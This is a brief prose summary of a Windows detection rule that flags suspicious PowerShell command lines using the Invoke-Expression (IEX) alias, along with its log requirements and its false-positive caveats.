This detection rule is designed to identify potentially malicious execution patterns associated with PowerShell's Invoke-Expression (IEX) alias. It focuses on the command line arguments passed to PowerShell and PWSh binaries that exhibit suspicious behavior indicative of intent to execute arbitrary code. The rule looks for specific patterns such as the presence of the IEX alias coupled with various command constructs that could indicate attempts to obfuscate malicious activity. Common coding patterns that could be part of exploit attempts are detected through a combination of combined and standalone selections. The rule provides high-confidence alerts while acknowledging the risk of false positives from legitimate scripts that also use IEX for their normal operations. Notably, the rule requires process creation logs as input from Windows environments to function effectively, making it essential for monitoring PowerShell activities vulnerable to exploitation. Overall, this rule plays a crucial role in mitigating the risks posed by common attack techniques utilizing PowerShell for execution of payloads.